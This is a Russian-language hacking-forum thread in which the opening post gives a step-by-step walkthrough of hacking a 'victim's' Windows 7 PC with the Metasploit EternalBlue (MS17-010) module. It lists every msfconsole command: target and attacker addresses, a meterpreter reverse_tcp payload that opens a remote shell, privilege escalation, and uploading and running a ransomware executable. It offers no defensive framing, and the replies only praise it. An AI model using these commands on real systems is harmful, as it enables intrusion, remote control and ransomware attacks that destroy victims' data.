Загрузка...

Hacking the victim's Windows PC and infecting it with a ransomware virus

Thread in Virology created by mrJollier Dec 4, 2017. 1006 views

  1. mrJollier
    mrJollier Topic starter Dec 4, 2017 Всё ещё живой 540 Feb 15, 2017
    Всем привет! Наверняка многие из вас слышали про EternalBlue - кодовое имя эксплойта, эксплуатирующего компьютерную уязвимость в Windows-реализации протокола SMB, к разработке которого, как считается, причастно Агентство национальной безопасности (США). Секретные сведения об уязвимости и исполняемый код эксплойта были опубликованы хакерской группой The Shadow Brokers 14 апреля 2017 года. Уязвимость была использована при распространении вредоносного ПО WannaCry в мае 2017 года. В этой статье я бы хотел обратить на него внимание, и попробовать в действии.

    [IMG]
    В последней версии Metasploit Framework присутствует, необходимый нам, для этого модуль.



    Этот модуль является портом эксплойта группы ETERNALBLUE, частью инструментария FuzzBunch, выпущенного Shadow Brokers. Существует операция переполнения буфера в Srv! SrvOs2FeaToNt. Размер вычисляется в Srv! SrvOs2FeaListSizeToNt, с математической ошибкой, когда DWORD вычитается в WORD. Пул ядра подготовлен так, чтобы переполнение было хорошо продуманно, чтобы перезаписать буфер SMBv1. Фактический захват RIP будет завершен позже в srvnet! SrvNetWskReceiveComplete. Этот эксплоит, как и оригинал, может не срабатывать с 100% шансом в течение определенного промежутка времени, и должен запускаться непрерывно до момента срабатывания.



    Приступим к осуществлению, в качестве атакующего хоста Kali Linux 2017.1, в качестве цели Windows 7.



    > msfupdate

    [IMG]
    > msfconsole



    > use exploit/windows/smb/ms17_010_eternalblue



    > msf exploit(ms17_010_eternalblue) >set rhost 192.168.1.105



    > msf exploit(ms17_010_eternalblue) >set lhost 192.168.1.21



    > msf exploit(ms17_010_eternalblue) >set payload windows/x64/meterpreter/reverse_tcp



    > msf exploit(ms17_010_eternalblue) >exploit

    [IMG]
    Эксплоит срабатывает на отлично, получаем системные привилегии:



    > getsystem



    > getuid


    [IMG]
    Немного усугубим ситуацию, закинув целевому хосту вирус-вымогатель (аналог WannaCry). Его исходники есть в открытом доступе.

    [IMG]
    > upload /root/ransomware.exe C:\\



    > shell



    > cd C:\\



    > ransomware.exe

    [IMG]
    И как итог:

    [IMG]
    Вот собственно, и все. Спасибо за внимание.
     
  2. Darkhaese208060
  3. Darkhaese208060
    Годно
     
  4. fedorsorkin
    fedorsorkin Sep 29, 2018 Лучше синица в руке, чем рука в синице 35 Jun 12, 2018
    класс, вспомнили об этой теме спустя год...
     
  5. Darkhaese208060
  6. Darkhaese208060
    Когда увидел тогда отметил
     
Loading...
Top